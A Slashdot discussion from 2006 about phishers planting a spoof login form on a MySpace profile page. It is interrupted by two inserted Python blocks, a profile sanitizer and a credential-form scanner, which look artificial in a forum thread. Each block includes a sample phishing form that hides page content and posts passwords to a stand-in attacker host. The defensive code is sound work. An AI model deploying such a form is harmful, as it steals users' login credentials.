MySpace Accounts Compromised By Phishers 86

Posted by kdawson
from the even-the-wary-beware dept.
An anonymous reader writes, "Netcraft has discovered that the social networking site MySpace appears to have been compromised by phishers who have presented a spoof login form on the main site. This modified login form submits the victim's username and password to a remote server hosted in France." From the article: "The hackers have engineered a fake login form on MySpace's own web site. Netcraft has notified MySpace of the issue, although it currently remains live. Because the fraudulent login page is hosted on MySpace's own servers and does not exhibit any signs of external content, such as cross-site scripting or open redirects, it is convincing and even security-conscious users are at risk of becoming victims. The attack is launched from a profile page, where the username is login_home_index_html, and uses specially-crafted HTML in order to hide the genuine MySpace content from the page and instead display its own login form." This Washington Post story from a few months back explains what's in it for the phishers.
  • by AVryhof (142320) <avryhof AT gawab DOT com> on Sunday October 29, 2006 @03:02PM (#16634080) Homepage
    Maybe it's been my fault it's taken so long to "discover"

    I've been seeing 'em now and then and contacting the hosts where the scripts are hosted to get their accounts disabled.

    I'm not worried about being phished myself... I'm quite perceptive...but it's people I know who I'm worried about.
    • Re: (Score:2, Funny)

      by Anonymous Coward
      Yes, all the internets depend on you for security. Please, think of the children next time and stop reporting security holes.
    • Re: (Score:2, Funny)

      by Packt (1017572)
      "Dear diary... mood? Apathetic."
  • Widespread exploitation of myspace could cause up to $6 dollars in damages
  • Finally (Score:3, Funny)

    by 1310nm (687270) on Sunday October 29, 2006 @03:09PM (#16634128)
    Keep up the good work, phishers!

    The secrets of apathetic teens will soon be aired for the world to view!
    • Not quite. (Score:1, Informative)

      by Anonymous Coward
      "Despite public perception, most MySpace users are over 35, according to a release today [05 Oct 2006] by ComScore. The stat-tracking company says that as MySpace continues to grow, its user base is skewing older - teens accounted for around 25% of users in August 2005, but now only represent 12% of the audience. Almost 41% of MySpacers are aged 35 to 54 - a big increase since last year."

      http://www.comscore.com/press/release.asp?press=10 19 [comscore.com]
      • by Fred_A (10934) <fredNO@SPAMfredshome.org> on Sunday October 29, 2006 @04:07PM (#16634684) Homepage
        Almost 41% of MySpacers are aged 35 to 54 - a big increase since last year.
        So it's TheirSpace now ?
      • by 1310nm (687270)
        Guess I should have just called them "narcissists" instead of "apathetic teens".
      • by 5of0 (935391)
        But how many of these over-35ers are actually over 35? And how many are over 100? Is there any accountability check as to the ages? Looking at their article, they're counting unique visitors - did they pop up a little box that said "Hey, how old are you?" A very important part is that it says "MySpace Visitors" - not users. So not users, but parents checking up on their little users, or pedophiles looking for their next victim. This just means Xanga is less browsed by those types. Anyone else see this?
    • .. which seems to be the most popular with the angsty crowd. MySpace, on the other hand, is the single largest concentration of insanity, drama and nonsense ever, surpassing even LJ. I'm not kidding - just try browsing through some of the comments and profiles on MySpace and you'll lose all faith in humanity in the space of about five minutes.
      • besides if you really wanted to do this right you would have

        1 a real like paid domain ------- got that myself
        2 a real like paid hosting agreement ----- i use imagelinkusa.net myself
        3 some actual html skills (or some sanish tools)
        if you want to use some crawling horror like Myspace setup some sort of Zen profile and LINK YOUR DOMAIN

        (funny thing is mySpace is blocked by at least one company)
      • Why did you have faith in humanity in the first place?

        Just curious...
  • by Anonymous Coward on Sunday October 29, 2006 @03:13PM (#16634170)
    OpenDNS people started http://phishtank.com/ [phishtank.com] service which is completely community based, as you can actually see the phishes and verify them, I have seen some amazing stuff around. Compromised servers having SSL certificate which are abused in phishing operation, some pages having fake addressbar on top and most important of all, USA based banks are being phished from USA cable modem subscriber (haxored) and nothing done against it for days.

    BTW as it is free to use, SURBL added it, now the stuff which you verify actually helps people using that free list.
  • by Aexia (517457)
    MySpace is dying
  • As much as they will beat this feature to death over the next few months, it will only deter the least sophisticated methods. Most of which are already history.

    Meanwhile "web 2.0" applications will suffer phishing attacks anyway because the 2.0 complexity offers so many new ways to do bad things.

    Today myspace, tomorrow your web 2.0 bank? Google 2.0 application?

    I'm not saying progress is bad. But there's no penalty/liability for writing insecure web 2.0 apps.
    • by d3ik (798966)
      If you're implying that MySpace is Web 2.0 I'd have to disagree. MySpace may be great for 'social networking', but from a technical point of view it's a nightmare. Malformed HTML, non-degradable Javascript, code injection issues... it's like a bad joke.
      • > MySpace may be great for 'social networking', but from a technical point of
        > view it's a nightmare. Malformed HTML, non-degradable Javascript, code
        > injection issues...

        In other words, Web 2.0.
  • http://www.myspace.com/login_home_index_html [myspace.com]

    Seems Myspace has fixed it. Not that I really care, as I've never used it nor do I have any intention to.

    Next!?
    • Re: (Score:1, Insightful)

      by Anonymous Coward
      Seems Myspace has fixed it.

      No, they've deleted this one specific account - the vulnerability that allowed the phishers to insert a form (and the styling to remove the regular page content (which is a feature)) is almost certainly still there.

      Expect to see a large number of variations on this to show up in the next few days/weeks.
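The comment above makes the point that deleting one profile does not remove the underlying problem: a profile author can still inject a form and styling that hides the real page. As an added example (not MySpace's code, and not from the Netcraft article), here is the kind of allowlist sanitizer a site would apply to user-supplied profile HTML before rendering it. It drops form controls, scripts and stylesheets together with their contents, strips `style=` and event-handler attributes, and rejects non-http(s) links. The sample profile and the host name `phish-host.example` are constructed placeholders.

```python
# Added example (not MySpace's code): an allowlist sanitizer for user-supplied
# profile HTML that removes form/input elements and author-controlled styling,
# so a profile cannot present a login form or hide the host page's own content.
# Uses only the Python standard library.
from html import escape
from html.parser import HTMLParser

# Tags a profile may keep; everything else is dropped (text kept) or, for the
# DROP_WITH_CONTENT set, dropped together with everything inside it.
ALLOWED_TAGS = {"p", "b", "i", "em", "strong", "br", "a", "img", "ul", "ol", "li", "div", "span"}
ALLOWED_ATTRS = {"a": {"href", "title"}, "img": {"src", "alt"}}
DROP_WITH_CONTENT = {"form", "script", "style", "iframe", "object", "embed",
                     "textarea", "select", "button"}
VOID_TAGS = {"br", "img"}


def _safe_url(value):
    """Allow only http(s) or site-relative URLs; rejects javascript:, data: and //host."""
    v = (value or "").strip().lower()
    return v.startswith(("http://", "https://")) or (v.startswith("/") and not v.startswith("//"))


class ProfileSanitizer(HTMLParser):
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []        # sanitized output fragments
        self.dropped = []    # names of removed elements, for logging/review
        self.skip_depth = 0  # >0 while inside an element whose content is discarded

    def handle_starttag(self, tag, attrs):
        if self.skip_depth:
            if tag in DROP_WITH_CONTENT:
                self.skip_depth += 1
            return
        if tag in DROP_WITH_CONTENT:
            self.dropped.append(tag)
            self.skip_depth = 1
            return
        if tag not in ALLOWED_TAGS:
            self.dropped.append(tag)   # disallowed tag: strip the tag, keep its text
            return
        kept = []
        for name, value in attrs:
            # No style= or on*= attribute survives, so no CSS hiding and no inline handlers.
            if name not in ALLOWED_ATTRS.get(tag, set()):
                continue
            if name in ("href", "src") and not _safe_url(value):
                continue
            kept.append(f' {name}="{escape(value or "")}"')
        self.out.append(f"<{tag}{''.join(kept)}>")

    def handle_endtag(self, tag):
        if self.skip_depth:
            if tag in DROP_WITH_CONTENT:
                self.skip_depth -= 1
            return
        if tag in ALLOWED_TAGS and tag not in VOID_TAGS:
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if not self.skip_depth:
            self.out.append(escape(data))


def sanitize_profile(html):
    """Return (clean_html, dropped_tag_names) for a user-supplied profile fragment."""
    p = ProfileSanitizer()
    p.feed(html)
    p.close()
    return "".join(p.out), p.dropped


# Constructed sample of the pattern described in the thread: a stylesheet that hides
# the host page's content plus a login form posting to a placeholder attacker host.
SAMPLE_PROFILE = """<style>body > * { display: none }</style>
<p>Hello, <b>friends</b>!</p>
<form method="post" action="http://phish-host.example/collect">
  E-mail: <input name="email"> Password: <input type="password" name="password">
  <input type="submit" value="Login">
</form>
<a href="javascript:alert(1)">click</a>
<a href="http://www.myspace.com/tom">Tom</a>"""

if __name__ == "__main__":
    clean, dropped = sanitize_profile(SAMPLE_PROFILE)
    print(clean)
    print("dropped:", dropped)
```

Keeping the list of dropped tag names per save gives moderators a cheap signal: a profile whose saves repeatedly contain `form` or `style` elements is worth a look even though the rendered result is harmless.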

  • by kihjin (866070) on Sunday October 29, 2006 @03:24PM (#16634254)
    FTA:

    The attack is launched from a profile page, where the username is login_home_index_html, and uses specially-crafted HTML in order to hide the genuine MySpace content from the page and instead display its own login form.

    Netcraft says this is still live on Myspace's main page. I've looked at the HTML source for both the main page, and that special login page you get when you try to access a portion of the site that requires you to log in. On both pages, I located the form element which controls the login. The method is POST, and the action redirects to a script under the "login.myspace.com" domain.

    So the summary and the article itself is slightly misleading (at first) by implying (perhaps unintentionally) that the phishing attempt is coming directly from Myspace's main page.
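The story summary and kihjin's comment above both come down to one check: where does the login form actually send the credentials? The genuine form posts to a script under login.myspace.com, while the spoofed one on the profile page posts to a remote server. As an added example (not Netcraft's or MySpace's code), here is a small scanner that finds every form on a page containing a password field, resolves its action against the page URL and reports whether the target host belongs to a trusted domain. The sample pages are constructed; the script path under login.myspace.com and the host `spoof-host.example` are placeholders, since the thread names the domain but not the script or the remote server.

```python
# Added example (not Netcraft's or MySpace's code): a defender-side check that
# walks every form on a page, keeps the ones that collect a password, resolves
# their action URL against the page URL, and reports whether the credentials
# would be posted to a trusted host. Standard library only.
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit


class FormCollector(HTMLParser):
    """Collects each <form> with its action, method and count of password inputs."""

    def __init__(self):
        super().__init__()
        self.forms = []
        self.current = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self.current = {"action": a.get("action") or "",
                            "method": (a.get("method") or "get").lower(),
                            "password_fields": 0}
        elif tag == "input" and self.current is not None:
            if (a.get("type") or "text").lower() == "password":
                self.current["password_fields"] += 1

    def handle_endtag(self, tag):
        if tag == "form" and self.current is not None:
            self.forms.append(self.current)
            self.current = None


def find_credential_forms(page_url, html, trusted_hosts):
    """One finding per password-collecting form: where it posts and whether that host is trusted."""
    parser = FormCollector()
    parser.feed(html)
    parser.close()
    if parser.current is not None:        # unclosed <form> at end of document
        parser.forms.append(parser.current)
    findings = []
    for form in parser.forms:
        if form["password_fields"] == 0:
            continue                       # search boxes etc. are not credential forms
        target = urljoin(page_url, form["action"])   # empty action posts back to the page itself
        parts = urlsplit(target)
        host = (parts.hostname or "").lower()
        trusted = any(host == t or host.endswith("." + t) for t in trusted_hosts)
        findings.append({"target": target, "host": host, "scheme": parts.scheme,
                         "method": form["method"], "trusted": trusted})
    return findings


TRUSTED_HOSTS = ("myspace.com",)

# Constructed sample pages. "/login-script" and "spoof-host.example" are placeholders.
GENUINE_PAGE = """<form action="/search" method="get"><input name="q"></form>
<form action="https://login.myspace.com/login-script" method="post">
  <input name="email"><input type="password" name="password">
</form>"""

SPOOFED_PROFILE = """<p>Please log in to continue</p>
<form action="http://spoof-host.example/collect" method="post">
  <input name="email"><input type="password" name="password">
</form>"""

if __name__ == "__main__":
    for url, page in (("http://www.myspace.com/", GENUINE_PAGE),
                      ("http://www.myspace.com/login_home_index_html", SPOOFED_PROFILE)):
        for f in find_credential_forms(url, page, TRUSTED_HOSTS):
            verdict = "ok" if f["trusted"] else "CREDENTIALS LEAVE TRUSTED DOMAIN"
            print(f"{url}: {f['method']} -> {f['target']} [{verdict}]")
```

The same routine, run by a site over its own user-generated pages, catches exactly the case in the story: the profile page itself is on the trusted domain, so the browser address bar looks right, but the form's resolved action is not. Checking the scheme as well (a password form posting over plain http) is a second, independent warning sign.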
  • With MySpace being so popular and with its users regularly logging in on a daily basis, I wonder what the impact of this was in terms of:
    1) the total number of "phished" accounts
    2) the number of "phished" accounts in terms of a percentage of the total userbase.
    • Possibly not many, since less than one third of all MySpace accounts are active.
      • by otisg (92803)
        Really? Where did you get this information? I haven't seen this information published anywhere... but would love to see where this info comes from.
        • Using a sample size of 14 Million accounts, only about 4 Million were accessed within 14 days of the page being sampled and contained more than the default information. Of those, the vast majority were accessed within 3 days of the sample date. This rate remains fairly constant throughout the user space, starting with the first users.
          • by otisg (92803)
            This is an experiment you performed on your own?
            • Yes. I did it originally to see the age distribution of the users to see if it really was populated by teenagers who identify themselves as 12-15 year old girls and therefore be an easy hunting ground for the dreaded pedophiles. Well this is what I found:

              MySpace Age Ranges By Gender As Indicated By Users

              Age Range   % Male   % Female   % Total
              12 to 15    0.0007   0.0012     0.0019
              16 to 18    9.25     12.39      21.64
              19 to 21    11.64    12.29      23.93
              22 to 35    22.90    18.00      40.90
              36 to 55
    • by Siroro (957832)
      I used to host a free web hosting service. And as you can imagine it did attract some unsavoury characters - one of the accounts was used as a MySpace phishing account, it was only on-line for 1-2 days before I managed to catch and ban the account, but in this time it did manage to obtain details for over 2000 individual logins - whether or not all of these credentials worked or not I can't say for sure. I tried contacting MySpace offering over these credentials but I didn't receive an e-mail back.
  • MySpace is free.. I can understand phishing for credit card numbers or bank logins, But MySpace?
    • by otisg (92803)
      You clearly didn't read the Washington Post article.

      The 16-year-old kid who logs onto MySpace at 02:41 is using the same computer in the basement that mom and dad use the next morning at 07:45 to log into their bank accounts, pay bills, trade some stock, and so on.

      That's why even a free MySpace is a good target. As a matter of fact, MySpace is an excellent target because it has highly loyal and extremely active users who log into MySpace multiple times a day. This means that if the phishers' crack stays
      • by Fred_A (10934)
        The 16-year-old kid who logs onto MySpace at 02:41 is using the same computer in the basement that mom and dad use the next morning at 07:45 to log into their bank accounts, pay bills, trade some stock, and so on.
        Ah yes but mom and dad would do so with a different account and password and home directory, right ?
        Huh ? Right ?

        Guys ?
      • Yeah... I certainly had to read the Post article. My first thought on the story was "Phish a MySpace account?!? That's like an elaborate plot to steal manure!"

    • MySpace is free.. I can understand phishing for credit card numbers or bank logins, But MySpace?

      People login to myspace with an email address and password.

      If a person used the same password for their email, then not only is their email compromised, but via their email, the attacker gets a list of other potential sites to try.


      I would be extra suspicious of strange behaviour by ebay users for example. What is especially insidious about this is that once you've got someone's email account, you can run
    • by 4D6963 (933028)

      MySpace is free.. I can understand phishing for credit card numbers or bank logins, But MySpace?

      There's actually a great interest in it. Because when you're an average user, unaware of that whole phishing thing, and that bulletins one of your favourite singers or friends say "~New Ring tones Adults can't hear! Download Today*", linking to a website to supposedly download them, you're much more likely to click, thinking it was advised to you by someone real (a "friend" or an artist you like), than when you

    • by prodangle (552537)
      According to Tom [myspace.com] (the guy who runs Myspace, I think) spammers can use login credentials to send spam to friends of a user. There are also screenshots on Tom's blogpost - it seems the best workaround so far is instructing users to type myspace into the address bar themselves before logging in.
  • I clicked a myspace profile link in a friends bulletin which sent me to what I thought was the login page (I failed to check that hostname was indeed login.myspace.com) The login didn't appear to work and I attributed it to myspace being down at the time. It wasn't till later that I noticed I had posted a similar bulletin with a similar link (though that profile was already dead by the time I checked it). As far as I can tell the only thing they did was post a bulletin to try to get more accounts. I was abl
    • by SheeEttin (899897)
      What's even funnier is when you make an example phishing site and clearly mark it as phishing... and people still enter their information.

      True story... and I posted it on a forum where you don't want to click any links.

      (Captcha: mourning... I am, indeed, for today's security.)
  • Another danger of getting username/password combinations is that so many people use the same username/password EVERYWHERE. Once a thief gets the username/password for ANY site, even a completely useless site with nothing of value, they could then do a systematic login attempt at all the common sites and banks where you might be able to do some real damage.
  • It's not these little phishing sites that scare me, it's the banking/credit union sites. For example, http://www.wamucards.com/ [wamucards.com] (DON'T ENTER YOUR INFO HERE!).

    How do sites like these get SSL from Verisign? How could that slip through? There was a recent /. headline about SSL Extended Validation and how it's needed: http://it.slashdot.org/article.pl?sid=06/10/25/204 6225 [slashdot.org] In cases like these, I guess it makes sense
    • Re: (Score:3, Insightful)

      by baadger (764884)

      How do sites like these get SSL from Verisign? How could that slip through? There was a recent /. headline about SSL Extended Validation and how it's needed: http://it.slashdot.org/article.pl?sid=06/10/25/204 [slashdot.org] 6225 In cases like these, I guess it makes sense

      When you can buy SSL certificates so damn cheap, $15 or less at some places, no serious company is going to certify you as being hardened against XSS or traditional hacks like this and compensate you or your users when you DO get hacked.

      Besides, Verisig

    • Re: (Score:3, Interesting)

      by LO0G (606364)
      I'm confused. Here's the domain registration for wamucards.com:
      Registrant:
      Washington Mutual, Inc. (DOM-1398425)
      1201 3rd Ave Seattle WA 98101 US

      Domain Name: wamucards.com

      Registrar Name: Markmonitor.com
      Registrar Whois: whois.markmonitor.com
      Registrar Homepage: http://www.markmonitor.com/ [markmonitor.com]

      Administrative Contact:
  • This is really old news. Phishers have been around myspace for ever. They used to use embedded flash with action script to redirect and myspace upgraded to flash 9 which allows the server to restrict flash redirects ( a feature added at myspace's request). They mostly use the phished accounts for myspace spamming and botnet-worm distribution.
  • if people had just installed Firefox 2
  • My girlfriend's account was compromised like this about a month ago. She tried telling me the Mac has a virus (really). I made her change her password and now I periodically do a "Reset Safari" on 'her' browser.

    I haven't noticed any strange posts by her or anything since the initial attack, so it seems it's a one time only type deal. Of course, an attack like this could be potentially worse, hell I wish it was worse. I wish it would have ruined her account and wouldn't let her create a new one.

    The des

  • I tried to visit www.myspace.com/login_home_index_html and it appears the account has been taken down.

    Either that, or, that's what these scammers want us to think?
  • i remember when i was on the YTMND irc channel and some guy posted a link to a text file with 3k myspace logins. good times
  • So, how long was this active, does anybody know? The netcraft article is from the 27th, and today is the 29th. I believe it's down now, but how long has it been down since Netcraft notified myspace about it? It seems very trivial for myspace web admins to verify that the code includes the specific suspect URL and to take immediate action against it. In my industry (healthcare insurance), if any leak of information or incorrect data is suspected, the websites in question are immediately taken down until
    • When we first came across this information a few days ago, it was also linked to Mashable.com [mashable.com], which claims that up to 3,000 logins may have been compromised, and that they only recently became more successful in running the attack (having initially screwed up the inserted script). The other aspect is that Mashable appears to be talking about a slightly different phishing attack, which is still functional (using MySpace bulletins to spam other users).

      Filtering based on blacklists (as you are suggesting M

  • Those who may be wondering why phishers used MySpace.

    1. It is a good way to get information about the user
    2. Good way to get information about the user's friends.
    3. How many pc illiterate often use same password for multiple accounts?

    I have already added the following line to my hosts files:

    216.178.32.51 greentea420.iespanna.es
  • Hay guyz i hav this gr8 idea i tink i shud take a pikkchur of myself in da mirrur holding teh camerah at a weiurd angle isnt that original guyz? Amirite?

    War is fun when you hate both sides.
  • (Generally young) people with no desire to gain any technical understanding of securely maintaining responsibility over their own information use an (invariably) insecure operating system to access a web site designed specifically to make someone very rich by feeding advertisements at the same people in a way that makes them feel like "one of the pack" whilst divesting the site owners of any responsibility for that personal data by offering the service as "free".
  • This just adds to the reasons why I'm glad I stopped using this service. I deleted my account on here a few months ago. I was getting sick of the fake spam/scam accounts wanting to invite me to be their "friend". Yeah I know setting my profile to non public would stop this but then it defeats the whole point of having friends being able to find you.

    Also the MySpace site in general is kinda clunky.. Looks like some high school kid's project that's still learning HTML. In other words it looks like crap. I
